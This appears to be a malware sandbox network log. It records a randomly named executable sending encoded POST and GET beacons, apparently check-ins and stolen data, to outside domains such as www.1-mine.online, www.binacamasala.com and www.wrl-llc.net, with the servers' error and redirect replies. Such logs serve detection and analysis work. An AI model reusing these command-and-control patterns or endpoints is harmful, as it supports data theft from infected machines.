Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:55.194228888 CEST | 808 | OUT | POST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8uX+MhbjDYJwUYLPabXZUCipJAhc8/GWH8cdjlYF8r3IDvIlJkugExU65/HNcD4vfeIj8Ou/FCg+eR7/nVd1L8pvyUH7MrIyu4ATNVu7OsA74Mf947o0y4DuArwcpNnoEgbzysA1QxPOtGdxqecgnr7Mwi5ZtFWjw/Kc7P9a+x3y+7NbyMOp0Fg==
Oct 23, 2024 18:54:55.537986040 CEST | 1289 | IN | HTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:55 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYxnqG%2FjZIA2DRKZbj8%2Fnd4ZmfVGr4ZxHfvdewIPwKx3VTTjyk1BY%2B0vJNl525P0W8OGnygHEXwNSoEl4XFVAifQYNWtGx6WvUdBJi7xpFXlZkBmVJOq9rZb02DyoMlfr3xTvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7340734b807280-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95045&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 520: Web server
Oct 23, 2024 18:54:55.538037062 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><me
Oct 23, 2024 18:54:55.538203001 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: earfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"
Oct 23, 2024 18:54:55.538304090 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: te left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a hre
Oct 23, 2024 18:54:55.538321018 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: /div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-no
Oct 23, 2024 18:54:55.538572073 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: r" href="https://support.cloudflare.com/hc/en-us/articles/200171936-Error-520">Additional troubleshooting resources</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper w-240 lg:w-fu
Oct 23, 2024 18:54:55.538585901 CEST | 383 | IN
                                                                                                                                                                                                                        Data Ascii: ,c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.20 | 49814 | 172.67.148.133 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:57.829647064 CEST | 828 | OUT | POST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8s3OMtbfDJpwVc7PaV3ZQCitJAgIS80yH85hjiZF8mXIDkokDrOgbxU3E/C1cD4TfeMn8O//EEg+cZb/lY91L8pvyUH+ZrIqu/wDNav7NvA77Jf94o4154DvTr1F+NjYEgZ7ysTtT+PPmI9wWbcBLyI0+voJNBmbQ38RhSPuaykuM/9iaOMovYlOS4Hav1USPk1Q21KzAwdY=
Oct 23, 2024 18:54:58.170058966 CEST | 1289 | IN | HTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:58 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mk9e60SZ9N1mGtSkUqiDL4bbP18VrjEolXs9nWb%2FbtSKDeDswPRC3riPrEsFUrWGVVuVkgWhoj6yyWdAhShT6a8%2Be288%2FrQzTxyulzNzDoOnTI3teBEsxdX6AX5cIJP9lsMSMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d734083c957c339-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94539&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 520: Web server


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.20 | 49815 | 172.67.148.133 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:00.454953909 CEST | 1289 | OUT | POST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:55:00.798933029 CEST | 1289 | IN | HTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:00 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fk7FBYVHa0E78EVZ53FiiixP9nRDBelI8kawBvCbwd2RuGSnATKbdZFN1fR3oWGiPcAEpikonGrC%2B9XcK%2BDMSN%2BDrV3QojL1Qr441spDJsLV9TouiB%2B4Du4ABTYrL5ETsrS3kA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7340942ce71971-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95196&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7977&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 520: Web serv


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.11.20 | 49816 | 172.67.148.133 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:03.081058025 CEST | 535 | OUT | GET /u1q9/?Hh=g6BlO&2rul-=jd3Av2k5V8Eau16mgcfaPd8VebuAL1FcJ0MaInc68HOQ7ZBrvq4ejSFdl4VVlO0+8Eq38X9/B8LMXqH/bNKlbEK/GZjnRsE0t8/pdXuVmtOQpH7wXf7Q+zg= HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:55:03.421797037 CEST | 952 | IN | HTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:03 GMT
                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 15
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kJH%2F8GDa2bd3Ke9LMRTaVpHML5svpH%2F28tF0%2FnaStVXSKFhuaYUInme%2BSz7ALE4qR7EX%2Fv93Zmp0Y9%2BYlOpOFUBCAk%2FKEQVzEW0%2FbenxKYp%2FxwpOSiuSKjvejFM%2FR75OzjcB%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7340a49c924302-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94940&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Ascii: error code: 520


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49817 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:08.699902058 CEST | 817 | OUT | POST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV3whWRMKfzHna/cBzcSis4n/DKl1H3DmXk0zraqovLomOpjKuYzxJEjzYBAcTAd0PgIX9fcxu21LOox5OTGOjT09NTK4XNgq9qhgnonuRnjwaRoIMtJ9Sy/a9K+P1yisyue+NUezfp2IyEFypKwN2fedYpZG8h7kzfZF0kWrhZkDCYWzg4jRLg3A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49818 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:11.332071066 CEST | 837 | OUT | POST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV32BmRNrfzPna8QhzcESsCn/HKl0CsCQnk0TbarqXLtmOp66uduBJfjzUzAcvAd0bgISZfcgup67OqqpOVJujT09NTK7rrgqFqgQ3onLlm/gaS+YMtf9S2/a94+OZIiu6ue/9UfnLuv4yCdSoZjNCaVu0oeUw49U/RRz5+LZV9nQeqSDZQhTK7qHWxHn5YCPs9T8Js5Dx2Sd0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49819 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:13.976592064 CEST | 2578 | OUT | POST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:55:13.976644039 CEST | 5408 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49820 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:16.613600016 CEST | 538 | OUT | GET /e0v8/?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:55:19.657341003 CEST | 390 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:19 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49821 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:24.926263094 CEST | 802 | OUT | POST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=1sgMsd9dRWt8D9+YehfIetnj0BK8lZiAGEoxK9DwkuJB09ssnOKWOMdGsMTlCbDSLS73ZbU4l4kr0DNKH8ZUt/phmAGgy0NBSJ8NlKJrwIEeEBA1nBvf4QZUb4gSPF+ImSjYpbP9vElLoMX1EXkv6XTh6jUb6cF+8TnvCExBmn+S71vmW86eBhbTBTQnYHTxEg==


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
30          192.168.11.20  49822        3.33.130.190    80                5492  C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 18:55:27.562755108 CEST  822                OUT        POST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=1sgMsd9dRWt8CcOYSi3IPNngpxK8u5iEGEkxK4ngjdtB0c8smPKWLMdGjsTgdLCcLVzVZfc4l4gr0C9KHtZXtvpnvgGi/UNBSJ8NlKNRwIMeExw1ml7YkgZXMIgSLF+MmSj2pZqqvB5LoNn1BVMswXTn3DVN9dUS13LZBkFPvGu+3Di8LOO6CyHhFjpPaFSqZtTBNXwHJWn2Eez27TPyHqM=


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
31          192.168.11.20  49823        3.33.130.190    80                5492  C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 18:55:30.203603983 CEST  2578               OUT        POST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Data Ascii: 2rul-= [TRUNCATED]
Oct 23, 2024 18:55:30.203632116 CEST  5156               OUT
                                                                                                                                                                                                                        Data Ascii: 5+9x9JrKIOQDUBOUEjNdez5qqll8rKqZwBEdFPT37Sjn+816oLMoLPswo/VoAn9jX2QyBTq6HI2HnusWcbLL7FdNL/Sncdu7maMPv9ZevDwggcbgPfGnpWzspF8DECEteqBNBsLETmwsscZg+GllRRJYW8/Kd1xitNO8oKTokGPDCfaCUxzzCnvm4WjhPEnClWCOHn/jxvG+iPAWMFkMZgArzUMYRmZsoQy22I92/8sSxjmBo8v
Oct 23, 2024 18:55:30.203701019 CEST  237                OUT
                                                                                                                                                                                                                        Data Ascii: wsthckO+dqy4PnSLJllPk+7X7JuTD5V3je1wK/BNYVvhM8l60fwvWaE/Bo4yW12UIizlXZAYtx8fxTotlTCM6MEaTcVJUvqR7WWOwscMUsQ+rrfLCWsRwmdABDvzZz9almfJ/1L7xfA+FHlmgZrFxfnUvPOyLZlMOaVSWoY8LBCvOfwtChKm6oukO3aTBaF29g690K6Z3sL72aIKPwJadEXi2KdC7V8zP5xXao2lPHw==


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
32          192.168.11.20  49824        3.33.130.190    80                5492  C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 18:55:39.885266066 CEST  533                OUT        GET /n7zc/?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE= HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
